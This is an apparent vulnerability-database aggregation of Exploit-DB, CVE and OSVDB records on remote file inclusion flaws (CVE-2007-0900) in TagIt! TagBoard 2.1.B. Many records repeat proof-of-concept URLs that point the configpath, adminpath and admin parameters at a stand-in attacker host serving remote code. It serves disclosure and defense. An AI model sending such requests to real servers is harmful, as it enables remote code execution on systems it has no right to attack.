source: http://www.securityfocus.com/bid/22518/info
TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
TagBoard 2.1.b Build 2 and prior versions are vulnerable.
http://www.example.com/[TagIt_path]/CONFIG/errmsg.inc.php?configpath=http://example2.com/evil?
{"id": "EDB-ID:29580", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Tagit! Tagit2b 2.1.B Build 2 CONFIG/errmsg.inc.php configpath Parameter Remote File Inclusion", "description": "Tagit! Tagit2b 2.1.B Build 2 CONFIG/errmsg.inc.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "modified": "2007-02-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/29580/", "reporter": "K-159", "references": [], "cvelist": ["CVE-2007-0900"], "lastseen": "2016-02-03T10:38:26", "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-02-03T10:38:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0900"]}, {"type": "osvdb", "idList": ["OSVDB:34603", "OSVDB:34618", "OSVDB:34616", "OSVDB:34617", "OSVDB:34611", "OSVDB:34615", "OSVDB:34613", "OSVDB:34612", "OSVDB:34610", "OSVDB:34614"]}, {"type": "exploitdb", "idList": ["EDB-ID:29584", "EDB-ID:29581", "EDB-ID:29589", "EDB-ID:29590", "EDB-ID:29587", "EDB-ID:29578", "EDB-ID:29588", "EDB-ID:29592", "EDB-ID:29583", "EDB-ID:29591"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7245"]}], "modified": "2016-02-03T10:38:26", "rev": 2}, "vulnersScore": 7.2}, "sourceHref": "https://www.exploit-db.com/download/29580/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/CONFIG/errmsg.inc.php?configpath=http://example2.com/evil?", "osvdbidlist": ["34605"]}
{"cve": [{"lastseen": "2021-02-02T05:31:21", "description": "Multiple PHP remote file inclusion vulnerabilities in TagIt! Tagboard 2.1.B Build 2 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) configpath parameter to (a) tagviewer.php, (b) tag_process.php, and (c) CONFIG/errmsg.inc.php; and (d) addTagmin.php, (e) ban_watch.php, (f) delTagmin.php, (g) delTag.php, (h) editTagmin.php, (i) editTag.php, (j) manageTagmins.php, and (k) verify.php in tagmin/; the (2) adminpath parameter to (l) tagviewer.php, (m) tag_process.php, and (n) tagmin/index.php; and the (3) admin parameter to (o) readconf.php, (p) updateconf.php, (q) updatefilter.php, and (r) wordfilter.php in tagmin/; different vectors than CVE-2006-5249.", "edition": 6, "cvss3": {}, "published": "2007-02-13T20:28:00", "title": "CVE-2007-0900", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0900"], "modified": "2017-07-29T01:30:00", "cpe": ["cpe:/a:tagit:tagboard:2.1.b_build_2"], "id": "CVE-2007-0900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0900", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tagit:tagboard:2.1.b_build_2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/updatefilter.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/updatefilter.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/updatefilter.php?admin=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34617", "id": "OSVDB:34617", "title": "TagIt! Tagboard (tagit2b) tagmin/updatefilter.php admin Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/index.php script not properly sanitizing user input supplied to the 'adminpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/index.php script not properly sanitizing user input supplied to the 'adminpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/index.php?adminpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34614", "id": "OSVDB:34614", "title": "TagIt! Tagboard (tagit2b) tagmin/index.php adminpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/updateconf.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/updateconf.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/updateconf.php?admin=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34616", "id": "OSVDB:34616", "title": "TagIt! Tagboard (tagit2b) tagmin/updateconf.php admin Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/readconf.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/readconf.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/readconf.php?admin=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34615", "id": "OSVDB:34615", "title": "TagIt! Tagboard (tagit2b) tagmin/readconf.php admin Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/wordfilter.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/wordfilter.php script not properly sanitizing user input supplied to the 'admin' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/wordfilter.php?admin=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34618", "id": "OSVDB:34618", "title": "TagIt! Tagboard (tagit2b) tagmin/wordfilter.php admin Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTag.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTag.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/editTag.php?configpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34611", "id": "OSVDB:34611", "title": "TagIt! Tagboard (tagit2b) tagmin/editTag.php configpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTagmin.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/editTagmin.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/editTagmin.php?configpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34610", "id": "OSVDB:34610", "title": "TagIt! Tagboard (tagit2b) tagmin/editTagmin.php configpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tag_process.php script not properly sanitizing user input supplied to the 'configpath' or 'adminpath' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tag_process.php script not properly sanitizing user input supplied to the 'configpath' or 'adminpath' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tag_process.php?configpath=http://[attacker]/evil?\nhttp://[target]/[TagIt_path]/tag_process.php?adminpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34604", "id": "OSVDB:34604", "title": "TagIt! Tagboard (tagit2b) tag_process.php Multiple Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/verify.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/verify.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/verify.php?configpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34613", "id": "OSVDB:34613", "title": "TagIt! Tagboard (tagit2b) tagmin/verify.php configpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0900"], "description": "## Vulnerability Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/delTag.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nTagIt! Tagboard (tagit2b) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the tagmin/delTag.php script not properly sanitizing user input supplied to the 'configpath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[TagIt_path]/tagmin/delTag.php?configpath=http://[attacker]/evil?\n## References:\nVendor URL: http://www.deadlysin3.net/tagit2b/\nOther Advisory URL: http://echo.or.id/adv/adv65-K-159-2007.txt\nISS X-Force ID: 32436\nFrSIRT Advisory: ADV-2007-0557\n[CVE-2007-0900](https://vulners.com/cve/CVE-2007-0900)\nBugtraq ID: 22518\n", "edition": 1, "modified": "2007-02-11T23:41:25", "published": "2007-02-11T23:41:25", "href": "https://vulners.com/osvdb/OSVDB:34609", "id": "OSVDB:34609", "title": "TagIt! Tagboard (tagit2b) tagmin/delTag.php configpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T10:38:57", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/delTag.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/delTag.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29584", "href": "https://www.exploit-db.com/exploits/29584/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/delTag.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29584/"}, {"lastseen": "2016-02-03T10:39:26", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/manageTagmins.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/manageTagmins.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29587", "href": "https://www.exploit-db.com/exploits/29587/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/manageTagmins.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29587/"}, {"lastseen": "2016-02-03T10:38:33", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/addTagmin.php configpath Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/addTagmin.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29581", "href": "https://www.exploit-db.com/exploits/29581/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/addTagmin.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29581/"}, {"lastseen": "2016-02-03T10:40:09", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/updatefilter.php admin Parameter Remote File Inclusion. CVE-2007-0900 . Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/updatefilter.php admin Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29592", "href": "https://www.exploit-db.com/exploits/29592/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/updatefilter.php?admin=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29592/"}, {"lastseen": "2016-02-03T10:39:51", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/readconf.php admin Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/readconf.php admin Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29590", "href": "https://www.exploit-db.com/exploits/29590/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/readconf.php?admin=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29590/"}, {"lastseen": "2016-02-03T10:38:09", "description": "Tagit! Tagit2b 2.1.B Build 2 tagviewer.php Multiple Parameter Remote File Inclusion. CVE-2007-0900. Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagviewer.php Multiple Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29578", "href": "https://www.exploit-db.com/exploits/29578/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n\r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n\r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagviewer.php?configpath=http://example2.com/evil?\r\nhttp://www.example.com/[TagIt_path]/tagviewer.php?adminpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29578/"}, {"lastseen": "2016-02-03T10:39:36", "description": "Tagit! Tagit2b 2.1.B Build 2 tagmin/verify.php configpath Parameter Remote File Inclusion. CVE-2007-0900 . Webapps exploit for php platform", "published": "2007-02-12T00:00:00", "type": "exploitdb", "title": "Tagit! Tagit2b 2.1.B Build 2 tagmin/verify.php configpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0900"], "modified": "2007-02-12T00:00:00", "id": "EDB-ID:29588", "href": "https://www.exploit-db.com/exploits/29588/", "sourceData": "source: http://www.securityfocus.com/bid/22518/info\r\n \r\nTagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.\r\n \r\nExploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\r\n \r\nTagBoard 2.1.b Build 2 and prior versions are vulnerable. \r\n\r\nhttp://www.example.com/[TagIt_path]/tagmin/verify.php?configpath=http://example2.com/evil?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 